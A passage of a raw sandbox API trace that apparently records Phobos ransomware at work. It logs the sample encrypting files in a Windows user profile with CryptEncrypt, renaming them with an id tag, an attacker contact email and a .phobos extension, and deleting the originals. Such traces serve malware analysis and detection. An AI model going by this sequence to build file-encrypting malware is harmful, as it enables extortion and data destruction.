dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.517] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.517] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa328e8) returned 1 [0200.517] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.517] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2fa9, lpOverlapped=0x0) returned 1 [0200.574] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2fb0, dwBufLen=0x2fb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2fb0) returned 1 [0200.574] WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2fb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2fb0, lpOverlapped=0x0) returned 1 [0200.575] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0200.575] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.575] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0200.575] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.575] WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0200.575] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.576] CloseHandle (hObject=0x178) returned 1 [0200.576] CloseHandle (hObject=0x100) returned 1 [0200.576] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak")) returned 1 [0200.577] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.577] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=12201) returned 1 [0200.577] CloseHandle (hObject=0x100) returned 1 [0200.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt")) returned 0x2020 [0200.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.578] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.578] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.632] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0200.632] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.632] ReadFile (in: hFile=0x100, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2fa9, lpOverlapped=0x0) returned 1 [0200.680] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2fb0, dwBufLen=0x2fb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2fb0) returned 1 [0200.681] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2fb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2fb0, lpOverlapped=0x0) returned 1 [0200.681] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0200.681] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.681] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0200.682] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.682] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0200.682] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.682] CloseHandle (hObject=0x100) returned 1 [0200.682] CloseHandle (hObject=0xfc) returned 1 [0200.682] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt")) returned 1 [0200.683] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.685] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=174) returned 1 [0200.685] CloseHandle (hObject=0xfc) returned 1 [0200.685] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini")) returned 0x2026 [0200.685] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.685] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.685] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.687] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0200.687] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.688] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xae, lpOverlapped=0x0) returned 1 [0200.688] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0200.688] WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0200.690] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0200.690] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.690] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0200.690] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.690] WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0200.690] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.690] CloseHandle (hObject=0xfc) returned 1 [0200.690] CloseHandle (hObject=0x100) returned 1 [0200.690] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\burn\\burn\\desktop.ini")) returned 1 [0200.691] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.694] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=24) returned 1 [0200.694] CloseHandle (hObject=0x100) returned 1 [0200.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db")) returned 0x2020 [0200.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.694] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.694] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.696] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0200.696] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.696] ReadFile (in: hFile=0x100, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x18, lpOverlapped=0x0) returned 1 [0200.697] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x20, dwBufLen=0x20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x20) returned 1 [0200.697] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x20, lpOverlapped=0x0) returned 1 [0200.699] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0200.699] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.699] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0200.699] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.699] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0200.699] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.699] CloseHandle (hObject=0x100) returned 1 [0200.699] CloseHandle (hObject=0xfc) returned 1 [0200.699] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db")) returned 1 [0200.700] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.701] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1048576) returned 1 [0200.701] CloseHandle (hObject=0xfc) returned 1 [0200.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db")) returned 0x2020 [0200.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.701] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.701] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0200.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.701] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0200.701] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.701] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x100000, lpOverlapped=0x0) returned 1 [0200.932] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100010, dwBufLen=0x100010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100010) returned 1 [0200.942] WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x100010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x100010, lpOverlapped=0x0) returned 1 [0200.958] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328e8) returned 1 [0200.958] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0200.958] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0200.958] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.958] WriteFile (in: hFile=0x100, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0200.959] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.959] CloseHandle (hObject=0xfc) returned 1 [0200.959] CloseHandle (hObject=0x100) returned 1 [0200.959] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db")) returned 1 [0200.966] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0200.966] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.026] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=24) returned 1 [0201.026] CloseHandle (hObject=0x13c) returned 1 [0201.026] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db")) returned 0x2020 [0201.026] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0201.026] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.026] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0201.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.027] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0201.027] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.027] ReadFile (in: hFile=0x13c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x18, lpOverlapped=0x0) returned 1 [0201.028] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x20, dwBufLen=0x20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x20) returned 1 [0201.028] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x20, lpOverlapped=0x0) returned 1 [0201.029] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0201.029] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0201.029] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, 